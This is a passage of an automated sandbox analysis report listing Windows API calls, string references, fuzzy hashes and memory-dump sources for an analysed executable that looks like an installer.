                                                                                                      • Opcode Fuzzy Hash: 2e6935975283b392abf6eb535232e6e33c7297ce4864da2c850d0b2669d54df9
                                                                                                      • Instruction Fuzzy Hash: 99E092A1741B20EAEA10B7B67C86FAA2658EB1076DF500037F100A51F1C3BD1C80CE9E
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F089), ref: 0044C7EB
                                                                                                      • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C7FC
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C80C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                      • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                                      • API String ID: 2238633743-1050967733
                                                                                                      • Opcode ID: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                                      • Instruction ID: d6497c9818d993b67a5702c7731996643d684f189bbd4b702b1f6e54e13363b7
                                                                                                      • Opcode Fuzzy Hash: 580db4225bb49e0f2395934ae602c4dd6ca827d8c76c18c7318a842ee4a54372
                                                                                                      • Instruction Fuzzy Hash: 50F0DA70282305CAE750BBB5FDD57263694E3A470AF18277BE841551A2C7B94844CB8C
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                                      • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                                      • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                      • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                                      • API String ID: 667068680-222143506
                                                                                                      • Opcode ID: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                                      • Instruction ID: 32a0137ea675787c0bb1f7a77b9c903aea73f6d33f3aa717a8ad139b0a70eb03
                                                                                                      • Opcode Fuzzy Hash: 81267d710db967c56e7e702a34d1e8b60bf08845a808e06a5f27e56110be3c01
                                                                                                      • Instruction Fuzzy Hash: 4DC0C9F02C1700EEAA01B7B11DCAA7A255CC500728320843F7049BA182D97C0C104F3C
                                                                                                      APIs
                                                                                                      • GetFocus.USER32 ref: 0041B57E
                                                                                                      • GetDC.USER32(?), ref: 0041B58A
                                                                                                      • GetDeviceCaps.GDI32(?,00000068), ref: 0041B5A6
                                                                                                      • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5C3
                                                                                                      • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 0041B5DA
                                                                                                      • ReleaseDC.USER32(?,?), ref: 0041B626
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: EntriesPaletteSystem$CapsDeviceFocusRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 2502006586-0
                                                                                                      • Opcode ID: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                                      • Instruction ID: 1753bd22f5710d4f749a3cf2d8329d0f84e6490acb09e3fae29671003709e3a5
                                                                                                      • Opcode Fuzzy Hash: e956e6ae92597662ed98b2f51c6b506043ab8b509e5ceb21f610fa5f8f95298e
                                                                                                      • Instruction Fuzzy Hash: D0410631A04258AFDF10DFA9C885AAFBBB4EF59704F1484AAF500EB351D3389D51CBA5
                                                                                                      APIs
                                                                                                      • SetLastError.KERNEL32(00000057,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0B7
                                                                                                      • SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D184,?,00000000,0045D118,?,?,?,?,00000000), ref: 0045D0F6
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast
                                                                                                      • String ID: CLASSES_ROOT$CURRENT_USER$MACHINE$USERS
                                                                                                      • API String ID: 1452528299-1580325520
                                                                                                      • Opcode ID: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                                      • Instruction ID: 81e1e27ad3ae8d1ea1d6b81b4c13ff0be47bc54c17845d393ef4ad8e2f10c1e8
                                                                                                      • Opcode Fuzzy Hash: 44daac30ba6290961f85a10f910adeebe56024b8db7d764ffa7b36a0de599fb3
                                                                                                      • Instruction Fuzzy Hash: 2C117535A04608AFD731DA91C942B9EB6ADDF4470AF6040776D00572C3D67C5F0B992E
                                                                                                      APIs
                                                                                                      • GetSystemMetrics.USER32(0000000B), ref: 0041BDD5
                                                                                                      • GetSystemMetrics.USER32(0000000C), ref: 0041BDDF
                                                                                                      • GetDC.USER32(00000000), ref: 0041BDE9
                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000E), ref: 0041BE10
                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0041BE1D
                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0041BE56
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CapsDeviceMetricsSystem$Release
                                                                                                      • String ID:
                                                                                                      • API String ID: 447804332-0
                                                                                                      • Opcode ID: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                                      • Instruction ID: d5b995c8e3894394b735eabd433659eae54025482fea58e306a85006fdca5b97
                                                                                                      • Opcode Fuzzy Hash: 3bdc6123dd6674b0137b7fef1a93c0b96d54f33e4692062cf67464f69f8f60e7
                                                                                                      • Instruction Fuzzy Hash: E5212A74E04648AFEB00EFA9C941BEEB7B4EB48714F10846AF514B7690D7785940CB69
                                                                                                      APIs
                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0047E766
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC,?,0046CD49), ref: 0047E78C
                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0047E79C
                                                                                                      • SetWindowLongA.USER32(?,000000EC,00000000), ref: 0047E7BD
                                                                                                      • ShowWindow.USER32(?,00000005,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000,00000000,00000000,00000097,?,000000EC), ref: 0047E7D1
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057,?,000000EC,00000000,?,000000EC,?,00000000,00000000,00000000), ref: 0047E7ED
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Long$Show
                                                                                                      • String ID:
                                                                                                      • API String ID: 3609083571-0
                                                                                                      • Opcode ID: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                                      • Instruction ID: 463a5c2536fff799c7bf7cf61cbf8045bc8b98cac2b0bb45a0840e8ed8c25010
                                                                                                      • Opcode Fuzzy Hash: ff63fb1e20feffedf8b27b7393a281f73df7108790e31fa3444cbd3f3be65d10
                                                                                                      • Instruction Fuzzy Hash: 53010CB5641210ABEA00D769DE81F6637D8AB1C320F0943A6B959DF3E3C738EC408B49
                                                                                                      APIs
                                                                                                        • Part of subcall function 0041A6E0: CreateBrushIndirect.GDI32 ref: 0041A74B
                                                                                                      • UnrealizeObject.GDI32(00000000), ref: 0041B27C
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0041B28E
                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 0041B2B1
                                                                                                      • SetBkMode.GDI32(?,00000002), ref: 0041B2BC
                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 0041B2D7
                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0041B2E2
                                                                                                        • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                                                                                                      • String ID:
                                                                                                      • API String ID: 3527656728-0
                                                                                                      • Opcode ID: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                                      • Instruction ID: d03b18a2b949c207061bd18b8e5d47ed8ce294e6be165222704fda36eef26a4f
                                                                                                      • Opcode Fuzzy Hash: 90af7722afa79acc590a6ee3060039fb524340e2cf7ce152cccbdcb584e8dbde
                                                                                                      • Instruction Fuzzy Hash: 56F0CD756015009BDE00FFAAD9CBE4B3B989F043097048496B908DF187CA3CD8649B3A
                                                                                                      APIs
                                                                                                      • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539AB
                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,!nI,_iu,?,00000000,004539F6), ref: 004539BB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateFileHandle
                                                                                                      • String ID: !nI$.tmp$_iu
                                                                                                      • API String ID: 3498533004-584216493
                                                                                                      • Opcode ID: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                                                                      • Instruction ID: 7da7e9bbb2667b7856572ae533a3071efe8e017fb0344d9459fa270775feb22d
                                                                                                      • Opcode Fuzzy Hash: 1dee75e2bfc2da78c26475f080e8b0a4db6a1a73d39b0bf1d20dabbe4352c150
                                                                                                      • Instruction Fuzzy Hash: 1831C5B0A00249ABCB11EF95D842B9EBBB4AF44345F20453AF810B73C2D7785F058B69
                                                                                                      APIs
                                                                                                        • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                      • ShowWindow.USER32(?,00000005,00000000,00497FC1,?,?,00000000), ref: 00497D92
                                                                                                        • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                        • Part of subcall function 004072A8: SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                                        • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                                      • String ID: .dat$.msg$IMsg$Uninstall
                                                                                                      • API String ID: 3312786188-1660910688
                                                                                                      • Opcode ID: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                                      • Instruction ID: abb28459e614be91aca1b68aa70fad33032f6e559e3bf784a216f74f74fa669e
                                                                                                      • Opcode Fuzzy Hash: f79b411802c9da3a9116882e1755ce4b3781acbc659f3f1c23c36e526850363e
                                                                                                      • Instruction Fuzzy Hash: 89314F34A14114AFCB00EF65DD9296E7BB5EF89314F91857AF800AB395DB38BD01CB68
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EADA
                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAE0
                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB09
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                                      • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                                      • API String ID: 828529508-2866557904
                                                                                                      • Opcode ID: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                                                                      • Instruction ID: 7e091cf0cf0c4dae12ae48626bdfb721f4796128e550bb25d34418d77cfbcdd5
                                                                                                      • Opcode Fuzzy Hash: eb577c3347fbf9fd6a249885fcfc34f4074b2fa1c1d8d6afc25abb851ecf655c
                                                                                                      • Instruction Fuzzy Hash: 70F0C8D034061136E620B57F5C82F7B598C8F94759F140436B109E62C2D96CA905426E
                                                                                                      APIs
                                                                                                      • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00458028
                                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00458049
                                                                                                      • CloseHandle.KERNEL32(?,0045807C), ref: 0045806F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                                      • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                                      • API String ID: 2573145106-3235461205
                                                                                                      • Opcode ID: f4b7924840392a1c056809c60f673386a353f05297e24ea8de8fb179b7d06f04
                                                                                                      • Instruction ID: 2f0632834368beac7d1c7250186d6a5b4d0e74160b608b18ba1b2b0c741dc3d5
                                                                                                      • Opcode Fuzzy Hash: f4b7924840392a1c056809c60f673386a353f05297e24ea8de8fb179b7d06f04
                                                                                                      • Instruction Fuzzy Hash: 8101A231600204AFD710EBA98C02A5A73A8EB49B25F51407BFC10E73D3DE399E08965D
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA70,00000004,00499934,004571F1,00457594,00457148,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9C2
                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9C8
                                                                                                      • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9D9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                                      • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                                      • API String ID: 3478007392-2498399450
                                                                                                      • Opcode ID: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                                      • Instruction ID: c922fa4e85abb1c6873f36dcd01b6443d81c66d6c3501223796626af46e79b09
                                                                                                      • Opcode Fuzzy Hash: 3254194633b527647525dea76c004eb0f33bc99a9c522dc813bf1be520244ffe
                                                                                                      • Instruction Fuzzy Hash: 5CE0ECB2740324EADA103B627E8AF663558E724B19F50043BF001751F1C7FD1C80CA9E
                                                                                                      APIs
                                                                                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
                                                                                                      • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                                      • String ID: AllowSetForegroundWindow$user32.dll
                                                                                                      • API String ID: 1782028327-3855017861
                                                                                                      • Opcode ID: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                                      • Instruction ID: d51ed2a8d8be4cb67b0f2e6afaff03014389f5b4c9f6752a27b175deb1fe6994
                                                                                                      • Opcode Fuzzy Hash: 0c48b0152dcd94fde7082f0574e48419f86d5c04df14efc0ca492c8631bf730a
                                                                                                      • Instruction Fuzzy Hash: D7D0C790248701B9D910B3F64D46E9F3A5D894471CB50C47BB418E61C5DA7CFD04893D
                                                                                                      APIs
                                                                                                      • BeginPaint.USER32(00000000,?), ref: 00416C52
                                                                                                      • SaveDC.GDI32(?), ref: 00416C83
                                                                                                      • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D45), ref: 00416CE4
                                                                                                      • RestoreDC.GDI32(?,?), ref: 00416D0B
                                                                                                      • EndPaint.USER32(00000000,?,00416D4C,00000000,00416D45), ref: 00416D3F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                                      • String ID:
                                                                                                      • API String ID: 3808407030-0
                                                                                                      • Opcode ID: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                                      • Instruction ID: 8164e3b37c2b38cc39b91ef4074089abf19b8963c3e0e5cbd12a4ce3d65b1abe
                                                                                                      • Opcode Fuzzy Hash: ad781fe6fb59047a66b80eb53a3f65b2019eba16d1c733f202b60e39d660354f
                                                                                                      • Instruction Fuzzy Hash: A1415070A002049FCB14DBA9C585FAA77F9FF48304F1540AEE8459B362D778DD81CB58
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.2623322216.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.2623292732.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623422105.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623448778.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623467773.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000002.00000002.2623487075.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: b6913cb722474124f75cff2ee5949f067bbdde1b56a592e148b6496e85af3d5a
